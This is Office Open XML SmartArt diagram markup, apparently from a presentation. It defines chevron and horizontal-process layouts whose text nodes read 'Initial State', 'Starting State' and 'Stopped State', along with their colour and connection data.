    <dgm:cxn modelId="{70E9AE14-57D2-495C-A864-F126EF67D0D9}" srcId="{556A5724-F569-4E62-A06A-EF955228BDD4}" destId="{D9F23B6E-7C17-4145-A821-79930E25D143}" srcOrd="1" destOrd="0" parTransId="{E989BFE9-68E1-46CD-8EE7-655A131A166B}" sibTransId="{5093663E-91B2-454A-80A6-480A44D8FA51}"/>
    <dgm:cxn modelId="{47CA181B-B79C-4107-B318-30190E67042E}" type="presOf" srcId="{67B0FB01-62EF-4FD9-B14B-E14CA2382FBB}" destId="{E48A886F-F70F-4589-B1B1-2B531E2F93D3}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{288B7F1B-0ABF-4E34-A910-FD02905D5B95}" srcId="{0B1F21D0-7D66-45C4-8341-BEC4821FF234}" destId="{A0853D6A-3306-46DE-B7C9-1180A457A93B}" srcOrd="0" destOrd="0" parTransId="{52EACBBD-784F-4B11-9F88-991C3A9DCF15}" sibTransId="{CB15D0BC-FEB7-420C-9E7E-47C49F463859}"/>
    <dgm:cxn modelId="{E1496D23-6C20-4C1E-9F27-B21442C76197}" srcId="{0B1F21D0-7D66-45C4-8341-BEC4821FF234}" destId="{E20B3316-6894-47BF-936D-4997158667A5}" srcOrd="3" destOrd="0" parTransId="{4F2FC64A-6F58-42FE-82A0-90D13045355E}" sibTransId="{708700DA-338A-4EA7-9717-2682A8A9CB23}"/>
    <dgm:cxn modelId="{3CA1F828-DBC0-41FF-9625-1AED0AAFB88A}" type="presOf" srcId="{C68EAE3C-C847-4408-A85F-E5C9D50EF3AD}" destId="{2F144BE0-EA0C-49B2-9259-D5CB43DC3579}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{A3995A29-D63D-4EFF-B828-EC4178A160B0}" type="presOf" srcId="{CF3411F2-3672-4EB2-8883-6F7818E661EE}" destId="{1BC303FB-F10F-471F-81FA-439517E630C5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{C272DA29-3945-4D4C-BC4B-B7D8DE088E60}" type="presOf" srcId="{11356B31-11A9-424A-BAF7-069033E05AA0}" destId="{5B4C0F98-EFCD-4359-93F8-5DF7C115E4A3}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{CAAA972B-25E9-4D78-9B5F-51F3459FD7BC}" srcId="{0B1F21D0-7D66-45C4-8341-BEC4821FF234}" destId="{517F242F-192D-4867-A01A-BC6C343137C2}" srcOrd="5" destOrd="0" parTransId="{C1854194-AE97-4837-929E-A1A26DCC384D}" sibTransId="{2A9FDE40-8E97-4BD6-8A89-9D3E5813BA7E}"/>
    <dgm:cxn modelId="{06698F34-2C44-4D6F-8FF2-2688EA5FDB29}" type="presOf" srcId="{E20B3316-6894-47BF-936D-4997158667A5}" destId="{5B4C0F98-EFCD-4359-93F8-5DF7C115E4A3}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{7A15FD3D-7BFF-4D1C-9422-11E75970515D}" srcId="{0B1F21D0-7D66-45C4-8341-BEC4821FF234}" destId="{7C46405F-DED1-4CFD-88E8-F95F9DE2C773}" srcOrd="2" destOrd="0" parTransId="{9784BD4D-E298-450E-BFF6-F62E94165AFA}" sibTransId="{E9580F0E-653A-4552-B829-4C1C487126C8}"/>
    <dgm:cxn modelId="{E1076C3F-E86B-4379-B39E-EA83A2894ECB}" srcId="{607755AE-6D3C-4B35-A4F4-58D023A744C3}" destId="{804DC662-130D-4AE1-AAB3-0F4B5D0ADCB5}" srcOrd="0" destOrd="0" parTransId="{AEC2C06C-7EA7-4ED2-B7DF-05E047222A1D}" sibTransId="{3C60BFB9-3C6B-4451-8187-0C05CE9E5984}"/>
    <dgm:cxn modelId="{F78DFF40-E27F-4610-A35C-979ADB000C6F}" type="presOf" srcId="{96C7A794-D025-4708-BFEE-B22EE6916581}" destId="{5B4C0F98-EFCD-4359-93F8-5DF7C115E4A3}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{C0B56242-C929-4847-B539-277DD3C555B2}" type="presOf" srcId="{4D4AA186-05A1-4866-B0ED-142015896F29}" destId="{FA4380FC-EBEB-4F0D-A73C-2F7C02700B9E}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{A6FB7345-B8E7-4543-B929-E3D5C7B83D43}" srcId="{556A5724-F569-4E62-A06A-EF955228BDD4}" destId="{CF3411F2-3672-4EB2-8883-6F7818E661EE}" srcOrd="3" destOrd="0" parTransId="{C25E1997-9375-4858-8AE8-5FE6ADCDA3C1}" sibTransId="{DDF12DBE-6A84-41D5-A75F-705551FB2DE9}"/>
    <dgm:cxn modelId="{D6674C46-716F-48BE-823F-4B780F67A536}" srcId="{CF3411F2-3672-4EB2-8883-6F7818E661EE}" destId="{C68EAE3C-C847-4408-A85F-E5C9D50EF3AD}" srcOrd="0" destOrd="0" parTransId="{F1B3FF3E-AB5D-4E6E-B23D-0F944C5968BB}" sibTransId="{79934C41-D003-4F2D-87BE-D4A0E52919BF}"/>
    <dgm:cxn modelId="{322D5572-72F4-4ACD-8F8F-BC431532276D}" srcId="{0B1F21D0-7D66-45C4-8341-BEC4821FF234}" destId="{11356B31-11A9-424A-BAF7-069033E05AA0}" srcOrd="4" destOrd="0" parTransId="{C26AD57A-9F03-4769-A39C-E9E14AD45EA6}" sibTransId="{81932558-25BB-42BE-9038-EC2E092EBC0E}"/>
    <dgm:cxn modelId="{BE449E74-44DC-4AA8-A96F-3AFF58701E73}" srcId="{0B1F21D0-7D66-45C4-8341-BEC4821FF234}" destId="{96C7A794-D025-4708-BFEE-B22EE6916581}" srcOrd="1" destOrd="0" parTransId="{F8373BAC-5113-4257-A876-6724378C60FC}" sibTransId="{97B66785-0404-48BA-9671-677A4B2D06D4}"/>
    <dgm:cxn modelId="{5755FA56-300E-468A-A89D-153903345F87}" srcId="{D9F23B6E-7C17-4145-A821-79930E25D143}" destId="{4D4AA186-05A1-4866-B0ED-142015896F29}" srcOrd="1" destOrd="0" parTransId="{CC51368B-BF43-41B7-9037-BEDE7231C620}" sibTransId="{BC49A491-5FF9-44BF-9D06-117DFE9448E0}"/>
    <dgm:cxn modelId="{F078B578-7E9C-4736-A5FB-F306E6AD63B2}" srcId="{D9F23B6E-7C17-4145-A821-79930E25D143}" destId="{0CFD8401-B59D-47FC-9989-15C7164837BC}" srcOrd="2" destOrd="0" parTransId="{634E91D3-3C12-4F04-9061-85AC0A77DE36}" sibTransId="{F9B4835C-724D-4333-85C9-890F7D854EF7}"/>
    <dgm:cxn modelId="{95EE0D83-8E65-43A8-A8F7-9F73CCA34CAB}" type="presOf" srcId="{7C46405F-DED1-4CFD-88E8-F95F9DE2C773}" destId="{5B4C0F98-EFCD-4359-93F8-5DF7C115E4A3}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{F3372B86-4B9B-4298-9E53-DE31854CC036}" type="presOf" srcId="{804DC662-130D-4AE1-AAB3-0F4B5D0ADCB5}" destId="{E48A886F-F70F-4589-B1B1-2B531E2F93D3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{B414EB90-AB56-4E88-9404-B18B7F7226DC}" type="presOf" srcId="{D9F23B6E-7C17-4145-A821-79930E25D143}" destId="{8B06AF12-19C3-472D-B00C-49FAA7D775DF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{DE1A3B97-5F7B-4395-9047-6DCD555AB242}" type="presOf" srcId="{302DF25B-E219-4A4C-A39D-90384B6FDA2E}" destId="{FA4380FC-EBEB-4F0D-A73C-2F7C02700B9E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{A0E66A9E-A04E-4967-97C1-0CAD21A4562E}" srcId="{556A5724-F569-4E62-A06A-EF955228BDD4}" destId="{607755AE-6D3C-4B35-A4F4-58D023A744C3}" srcOrd="0" destOrd="0" parTransId="{577B3413-77DB-415E-AB6B-734E46530B10}" sibTransId="{E84F2386-1F83-4E57-9C2C-E3CE36BD4479}"/>
    <dgm:cxn modelId="{3DA3FB9E-31FF-4F3E-B936-45390FFC3518}" type="presOf" srcId="{517F242F-192D-4867-A01A-BC6C343137C2}" destId="{5B4C0F98-EFCD-4359-93F8-5DF7C115E4A3}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{BAE65B9F-D8D0-4111-842B-451CCAC0A99E}" type="presOf" srcId="{0B1F21D0-7D66-45C4-8341-BEC4821FF234}" destId="{51BD275B-9670-4E3E-878A-95D00B8730CC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{935D68A3-EF3F-44B7-ABC0-65CCC7826BC7}" srcId="{D9F23B6E-7C17-4145-A821-79930E25D143}" destId="{302DF25B-E219-4A4C-A39D-90384B6FDA2E}" srcOrd="0" destOrd="0" parTransId="{EE074C33-CE69-4A09-BDCF-27F545DB3986}" sibTransId="{2511B955-4FCC-444E-8FC4-23F94FF2FF07}"/>
    <dgm:cxn modelId="{CF822BAF-9C3B-4012-BB88-71A6AA2599A7}" type="presOf" srcId="{15AA1C47-8ACE-4EBF-9906-3557E8BEE0A2}" destId="{2F144BE0-EA0C-49B2-9259-D5CB43DC3579}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{FED849B0-E9A3-4AC3-8B09-7D39DD13C7D0}" type="presOf" srcId="{77F4209F-60C3-440F-82FF-77848E6E8F43}" destId="{E48A886F-F70F-4589-B1B1-2B531E2F93D3}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{7DE90DB1-4317-438D-8C82-512FA4CEC11D}" type="presOf" srcId="{607755AE-6D3C-4B35-A4F4-58D023A744C3}" destId="{6A76AC43-E4B8-4972-AF33-EFEA7466E88F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{356961C2-BC1B-41DE-B00B-0039A73AB3E3}" srcId="{556A5724-F569-4E62-A06A-EF955228BDD4}" destId="{0B1F21D0-7D66-45C4-8341-BEC4821FF234}" srcOrd="2" destOrd="0" parTransId="{F930608F-11C6-4C34-9CD6-990D03F6DD98}" sibTransId="{195074D7-3A28-4AA4-894C-4192196215C5}"/>
    <dgm:cxn modelId="{07A360CE-BC66-4231-ACCC-48BE41E3ED7D}" srcId="{607755AE-6D3C-4B35-A4F4-58D023A744C3}" destId="{67B0FB01-62EF-4FD9-B14B-E14CA2382FBB}" srcOrd="2" destOrd="0" parTransId="{CEC9BB98-44E5-47E3-812E-21E060FAC203}" sibTransId="{C417A982-B059-475E-98D2-AB6ACE885E5C}"/>
    <dgm:cxn modelId="{2B30BCED-B201-4C10-8776-19B691DEC164}" srcId="{CF3411F2-3672-4EB2-8883-6F7818E661EE}" destId="{15AA1C47-8ACE-4EBF-9906-3557E8BEE0A2}" srcOrd="1" destOrd="0" parTransId="{2FBAA65D-479B-4925-896C-EB9B0BFFAC6C}" sibTransId="{BD161485-0531-4E71-995D-36993D193525}"/>
    <dgm:cxn modelId="{7BBDF40B-45C1-4901-880C-A0DE9C7413CF}" type="presParOf" srcId="{FF06B079-746B-4B92-98D2-7C7A5BB606DF}" destId="{6C5DA448-1BC9-4EA9-AC39-81D2500B9823}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{44757DA8-06AE-469F-963A-69816D33FE80}" type="presParOf" srcId="{6C5DA448-1BC9-4EA9-AC39-81D2500B9823}" destId="{6A76AC43-E4B8-4972-AF33-EFEA7466E88F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{D7B8252B-65EB-4916-948E-5DC5687F9909}" type="presParOf" srcId="{6C5DA448-1BC9-4EA9-AC39-81D2500B9823}" destId="{E48A886F-F70F-4589-B1B1-2B531E2F93D3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{A5EA202B-31A1-48AC-B3D5-27A211065181}" type="presParOf" srcId="{FF06B079-746B-4B92-98D2-7C7A5BB606DF}" destId="{BE1FFBE5-6BC2-4333-A74F-FFD59BB01B5B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{246284EE-5581-4F79-BBCA-1963BAEFD3D8}" type="presParOf" srcId="{FF06B079-746B-4B92-98D2-7C7A5BB606DF}" destId="{FB4B3F42-7207-46EA-A36B-C8FC80AA4B7D}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{B769A051-034F-4B10-BC90-49E025DBAA38}" type="presParOf" srcId="{FB4B3F42-7207-46EA-A36B-C8FC80AA4B7D}" destId="{8B06AF12-19C3-472D-B00C-49FAA7D775DF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{3608E19D-59B3-4BA5-A45F-99B5A465E4EA}" type="presParOf" srcId="{FB4B3F42-7207-46EA-A36B-C8FC80AA4B7D}" destId="{FA4380FC-EBEB-4F0D-A73C-2F7C02700B9E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{088FE9FC-E971-42DD-B5B9-2F297BD4FA9E}" type="presParOf" srcId="{FF06B079-746B-4B92-98D2-7C7A5BB606DF}" destId="{6804EE7C-D94E-4396-B6A8-DBABB7C7F5A3}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{28B245EB-FA49-4CB5-8D78-D32AA0D3A1D0}" type="presParOf" srcId="{FF06B079-746B-4B92-98D2-7C7A5BB606DF}" destId="{745081C7-2CA3-47F0-94F6-71841B8EE2B9}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{8ABC61F8-DE3D-4ECE-B8A7-4694BA04905D}" type="presParOf" srcId="{745081C7-2CA3-47F0-94F6-71841B8EE2B9}" destId="{51BD275B-9670-4E3E-878A-95D00B8730CC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{0E9634E7-4917-45FF-BCFC-F98D0B996A0C}" type="presParOf" srcId="{745081C7-2CA3-47F0-94F6-71841B8EE2B9}" destId="{5B4C0F98-EFCD-4359-93F8-5DF7C115E4A3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{8836C47F-246A-4760-8E3D-6E8284AEEC55}" type="presParOf" srcId="{FF06B079-746B-4B92-98D2-7C7A5BB606DF}" destId="{4E5B62CB-FB11-40FF-B672-C5BE1AFD0E18}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{5932B56B-3BEC-42AE-9966-66D428814D77}" type="presParOf" srcId="{FF06B079-746B-4B92-98D2-7C7A5BB606DF}" destId="{A22ACD91-3725-4FB7-8E9C-64ED57DDBD6F}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{A4C9C954-C204-4417-8297-98F8432EF820}" type="presParOf" srcId="{A22ACD91-3725-4FB7-8E9C-64ED57DDBD6F}" destId="{1BC303FB-F10F-471F-81FA-439517E630C5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{B694B314-BAFD-4029-9302-6ABD33D567EE}" type="presParOf" srcId="{A22ACD91-3725-4FB7-8E9C-64ED57DDBD6F}" destId="{2F144BE0-EA0C-49B2-9259-D5CB43DC357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A5D39CD-C6E2-40A0-8283-74CFEB20D85C}"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5CCA12A7-5024-4E35-9D29-DA45B535D5CD}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Starting State</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" dirty="0">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F65C6837-A298-4BA4-970A-27C0EFB87EF5}" type="parTrans" cxnId="{174D597F-8161-4078-B268-EAA3BF7C55FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E2F4196-A464-4E20-9D8D-7E93750C60F2}" type="sibTrans" cxnId="{174D597F-8161-4078-B268-EAA3BF7C55FC}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:pattFill prst="pct80">
          <a:fgClr>
            <a:schemeClr val="tx2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:fgClr>
          <a:bgClr>
            <a:schemeClr val="bg1"/>
          </a:bgClr>
        </a:pattFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BE39E56-2A5F-424C-B43C-9BAB00EF8E09}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF9933"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Stopped State</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" dirty="0">
            <a:solidFill>
              <a:srgbClr val="FF9933"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FA722072-CD85-45F4-9F0F-90F7B8A41947}" type="parTrans" cxnId="{403622B7-4502-4F99-8ACA-0CF13521666D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8E95E3F-25FA-445F-9AEA-C5B7D476F0A0}" type="sibTrans" cxnId="{403622B7-4502-4F99-8ACA-0CF13521666D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D47A2ECB-127B-45E4-9677-330E3F7686E2}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Initial State</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{797B14D7-AA05-4E36-9A8A-3879869FC81A}" type="sibTrans" cxnId="{43AB37CA-2BB6-4FB5-8F24-548EF62CC241}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:pattFill prst="pct80">
          <a:fgClr>
            <a:schemeClr val="tx2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:fgClr>
          <a:bgClr>
            <a:schemeClr val="bg1"/>
          </a:bgClr>
        </a:pattFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9FD02915-21EC-4DE8-ADA9-C8614DA50EBE}" type="parTrans" cxnId="{43AB37CA-2BB6-4FB5-8F24-548EF62CC241}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C83DECB5-E68A-4B9C-B4E7-CC91BCFA3A22}" type="pres">
      <dgm:prSet presAssocID="{0A5D39CD-C6E2-40A0-8283-74CFEB20D85C}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3531F604-91AC-418F-BB08-75B660FA9DA5}" type="pres">
      <dgm:prSet presAssocID="{D47A2ECB-127B-45E4-9677-330E3F7686E2}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BCBF9E60-1795-4AF9-A355-39F2B992367F}" type="pres">
      <dgm:prSet presAssocID="{D47A2ECB-127B-45E4-9677-330E3F7686E2}" presName="imagSh" presStyleLbl="bgImgPlace1" presStyleIdx="0" presStyleCnt="3" custLinFactNeighborX="2780" custLinFactNeighborY="1819"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC72987A-5891-427B-8A96-0D62C22BFA14}" type="pres">
      <dgm:prSet presAssocID="{D47A2ECB-127B-45E4-9677-330E3F7686E2}" presName="txNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="85186" custScaleY="21971" custLinFactNeighborX="-17019" custLinFactNeighborY="11560">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B447285D-FEB6-4765-947F-0AA70C7F9007}" type="pres">
      <dgm:prSet presAssocID="{797B14D7-AA05-4E36-9A8A-3879869FC81A}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C6CD5565-A317-49EC-B85C-A1D0782ED81A}" type="pres">
      <dgm:prSet presAssocID="{797B14D7-AA05-4E36-9A8A-3879869FC81A}" presName="connTx" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{047D3B7E-5FEE-4068-9083-936BAC7F5FDB}" type="pres">
      <dgm:prSet presAssocID="{5CCA12A7-5024-4E35-9D29-DA45B535D5CD}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{11A0AAA9-22DF-40A6-AB32-44B2E094003C}" type="pres">
      <dgm:prSet presAssocID="{5CCA12A7-5024-4E35-9D29-DA45B535D5CD}" presName="imagSh" presStyleLbl="bgImgPlace1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE94521C-C32D-46A4-ABAC-9FFC33F4AD24}" type="pres">
      <dgm:prSet presAssocID="{5CCA12A7-5024-4E35-9D29-DA45B535D5CD}" presName="txNode" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="93733" custScaleY="21126" custLinFactNeighborX="-15905" custLinFactNeighborY="8011">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{67468CDE-98BA-46A7-8D56-C3DC496AC62A}" type="pres">
      <dgm:prSet presAssocID="{9E2F4196-A464-4E20-9D8D-7E93750C60F2}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{27AFD6DB-01B9-42F6-A54C-6B740C890197}" type="pres">
      <dgm:prSet presAssocID="{9E2F4196-A464-4E20-9D8D-7E93750C60F2}" presName="connTx" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E412D2C-7C2D-4772-BBF7-814C7CCD13DC}" type="pres">
      <dgm:prSet presAssocID="{2BE39E56-2A5F-424C-B43C-9BAB00EF8E09}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E7806E98-F2ED-40B6-85DC-A0C0CAA5BCBA}" type="pres">
      <dgm:prSet presAssocID="{2BE39E56-2A5F-424C-B43C-9BAB00EF8E09}" presName="imagSh" presStyleLbl="bgImgPlace1" presStyleIdx="2" presStyleCnt="3" custLinFactNeighborX="1117" custLinFactNeighborY="-343"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D14AB813-89AB-4C50-977B-AC0AC4A60D3B}" type="pres">
      <dgm:prSet presAssocID="{2BE39E56-2A5F-424C-B43C-9BAB00EF8E09}" presName="txNode" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="100000" custScaleY="20678" custLinFactNeighborX="-14506" custLinFactNeighborY="7899">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{A1D02704-E649-441B-82CE-F1A8D1CC35F6}" type="presOf" srcId="{2BE39E56-2A5F-424C-B43C-9BAB00EF8E09}" destId="{D14AB813-89AB-4C50-977B-AC0AC4A60D3B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{99A20848-86D5-4A6E-AC76-EA68B945497B}" type="presOf" srcId="{797B14D7-AA05-4E36-9A8A-3879869FC81A}" destId="{C6CD5565-A317-49EC-B85C-A1D0782ED81A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{09A9F16A-9E23-41E8-8790-4C29C8AFAA5A}" type="presOf" srcId="{9E2F4196-A464-4E20-9D8D-7E93750C60F2}" destId="{67468CDE-98BA-46A7-8D56-C3DC496AC62A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{2509B66E-227F-43C4-8B66-3AC3588B4B8F}" type="presOf" srcId="{9E2F4196-A464-4E20-9D8D-7E93750C60F2}" destId="{27AFD6DB-01B9-42F6-A54C-6B740C890197}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{174D597F-8161-4078-B268-EAA3BF7C55FC}" srcId="{0A5D39CD-C6E2-40A0-8283-74CFEB20D85C}" destId="{5CCA12A7-5024-4E35-9D29-DA45B535D5CD}" srcOrd="1" destOrd="0" parTransId="{F65C6837-A298-4BA4-970A-27C0EFB87EF5}" sibTransId="{9E2F4196-A464-4E20-9D8D-7E93750C60F2}"/>
    <dgm:cxn modelId="{5D0465A0-DFA9-4EF2-AC12-B1D75554BD95}" type="presOf" srcId="{797B14D7-AA05-4E36-9A8A-3879869FC81A}" destId="{B447285D-FEB6-4765-947F-0AA70C7F9007}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{555968A4-1EA7-482E-BD9D-F9930E4E5C9D}" type="presOf" srcId="{5CCA12A7-5024-4E35-9D29-DA45B535D5CD}" destId="{BE94521C-C32D-46A4-ABAC-9FFC33F4AD24}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess10"/>
    <dgm:cxn modelId="{403622B7-4502-4F99-8ACA-0CF13521666D}" srcId="{0A5D39CD-C6E2-40A0-8283-74CFEB20D85C}" destId="{2BE39E56-2A5F-424C-B43C-9BAB00EF8E09}" srcOrd="2" destOrd="0" parTransId="{FA722072-CD85-45F4-9F0F-90F7B8A41947}" sibTransId="{E8E95E3F-25FA-445F-9AEA-C5B7D476F0A0}"/>
